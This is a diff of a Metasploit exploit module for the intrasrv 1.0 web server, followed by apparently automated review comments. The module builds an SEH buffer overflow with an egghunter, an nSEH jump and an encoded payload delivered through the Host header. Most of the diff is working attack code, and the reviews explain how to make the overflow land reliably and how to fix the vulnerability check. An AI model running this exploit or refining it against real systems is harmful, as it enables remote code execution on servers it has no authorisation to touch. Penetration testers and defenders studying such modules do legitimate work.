10
10
class Metasploit3 < Msf ::Exploit ::Remote
11
11
Rank = NormalRanking
12
12
13
- include Msf ::Exploit ::Remote ::Tcp
13
+ include Msf ::Exploit ::Remote ::HttpClient
14
14
include Msf ::Exploit ::Egghunter
15
15
16
16
def initialize ( info = { } )
@@ -57,24 +57,15 @@ def initialize(info={})
57
57
'Privileged' => false ,
58
58
'DisclosureDate' => "May 30 2013" ,
59
59
'DefaultTarget' => 0 ) )
60
-
61
- register_options (
62
- [
63
- OptPort . new ( 'RPORT' , [ true , 'The remote port' , 80 ] )
64
- ] , self . class )
65
60
end
66
61
67
62
def check
68
- begin
69
- connect
70
- rescue
71
- print_error ( "Could not connect to target!" )
72
- return Exploit ::CheckCode ::Safe
73
- end
74
- sock . put ( "GET / HTTP/1.0\r \n " )
75
- res = sock . get
63
+ res = send_request_cgi ( {
64
+ 'method' => 'GET' ,
65
+ 'uri' => "/"
66
+ } )
76
67
77
- if res and res =~ /intrasrv 1.0/
68
+ if res and res . headers [ 'Server' ] =~ /intrasrv 1.0/
78
69
return Exploit ::CheckCode ::Vulnerable
79
70
else
80
71
return Exploit ::CheckCode ::Safe
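Review bot: With `send_request_cgi`, `res` is nil when the target cannot be reached, and the `if res and ...` test on new line 68 then falls through to `CheckCode::Safe`, so an unreachable host is reported as not vulnerable rather than unknown; adding `return Exploit::CheckCode::Unknown unless res` before the banner test keeps the two cases apart. The pattern `/intrasrv 1.0/` also leaves the dot unescaped, so `/intrasrv 1\.0/` is the intended match. A Server-header match only identifies the product, not the flaw, so `Exploit::CheckCode::Appears` would describe the evidence more honestly if the framework version in use provides it.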
@@ -88,19 +79,23 @@ def exploit
88
79
} )
89
80
90
81
# setup buffer
91
- buf = rand_text_alpha ( target [ 'Offset' ] -128 ) # junk to egghunter
82
+ buf = rand_text ( target [ 'Offset' ] -128 ) # junk to egghunter
92
83
buf << make_nops ( 8 ) + hunter # nopsled + egghunter at offset-128
93
- buf << rand_text_alpha ( target [ 'Offset' ] -buf . length ) # more junk to offset
84
+ buf << rand_text ( target [ 'Offset' ] -buf . length ) # more junk to offset
94
85
buf << "\xeb \x80 \x90 \x90 " # nseh - jmp -128 to egghunter
95
86
buf << [ target . ret ] . pack ( "V*" ) # seh
96
87
97
- # attach egg tag to payload
98
- shellcode = egg + egg
88
+ # Setup payload
89
+ shellcode = rand_text ( 1 ) # align payload
90
+ shellcode = egg + egg # attach egg tags
99
91
shellcode << payload . encoded
100
92
101
93
print_status ( "Sending buffer..." )
102
- connect
103
- sock . put ( "GET / HTTP/1.0\r \n Host: #{ buf } \r \n #{ shellcode } " )
104
- disconnect
94
+ send_request_cgi ( {
95
+ 'method' => 'GET' ,
96
+ 'uri' => "/" ,
97
+ 'vhost' => buf ,
98
+ 'data' => shellcode
99
+ } )
105
100
end
106
101
end
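Review bot: Replacing `rand_text_alpha` with `rand_text` for the two junk fillers (new lines 82 and 84) puts unrestricted bytes into the Host header, and if `rand_text` draws from the full 0x00–0xff range as the Rex helper does, a `\r` or `\n` in the filler terminates the header early so the nSEH/SEH overwrite no longer lands at `target['Offset']`; `\x00` or a space may have the same effect depending on how intrasrv tokenizes the line. Restoring `rand_text_alpha` for both fillers, or excluding the line-breaking bytes explicitly with `rand_text(target['Offset'] - 128, "\x00\x0a\x0d\x20")`, keeps the overflow layout stable. Separately, `shellcode = rand_text(1) # align payload` on new line 89 is dead code: the next line reassigns `shellcode = egg + egg`, so the alignment byte is never sent; either delete the line or write `shellcode << egg + egg` if that byte really is needed with the Content-Length-framed body `send_request_cgi` now emits (it is not obvious it is, since the egghunter locates the tag by scanning memory). The `exploit` method begins outside this hunk.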